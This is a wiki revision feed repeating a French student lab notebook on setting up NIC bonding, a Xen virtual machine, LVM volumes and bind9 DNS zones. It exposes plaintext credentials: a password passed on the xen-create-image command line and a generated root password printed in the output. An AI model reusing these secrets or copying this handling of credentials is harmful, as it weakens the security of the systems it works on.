=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 $TTL    10800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                              1         ; Serial&lt;br /&gt;
                          10800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.193&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND reverse data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net root.faispastomberlasavo.net (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 10      IN      PTR     ns1.faispastomberlasavo.net.&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns1.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.48&lt;br /&gt;
 Address:	193.48.57.48#53&lt;br /&gt;
 &lt;br /&gt;
 Non-authoritative answer:&lt;br /&gt;
 Name:	faispastomberlasavo.net&lt;br /&gt;
 Address: 217.70.184.38&lt;br /&gt;
&lt;br /&gt;
(ne marche plus ???)&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34973</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34973"/>
				<updated>2016-11-07T10:58:09Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 $TTL    10800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                              1         ; Serial&lt;br /&gt;
                          10800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.193&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND reverse data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net root.faispastomberlasavo.net (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 10      IN      PTR     ns1.faispastomberlasavo.net.&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns1.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.48&lt;br /&gt;
 Address:	193.48.57.48#53&lt;br /&gt;
&lt;br /&gt;
 Non-authoritative answer:&lt;br /&gt;
 Name:	faispastomberlasavo.net&lt;br /&gt;
 Address: 217.70.184.38&lt;br /&gt;
&lt;br /&gt;
(ne marche plus ???)&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34962</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34962"/>
				<updated>2016-11-07T10:41:25Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 $TTL    10800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                              1         ; Serial&lt;br /&gt;
                          10800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.193&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND reverse data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.faispastomberlasavo.net root.faispastomberlasavo.net (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.faispastomberlasavo.net.&lt;br /&gt;
 10      IN      PTR     ns1.faispastomberlasavo.net.&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns1.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34960</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=34960"/>
				<updated>2016-11-07T10:39:54Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
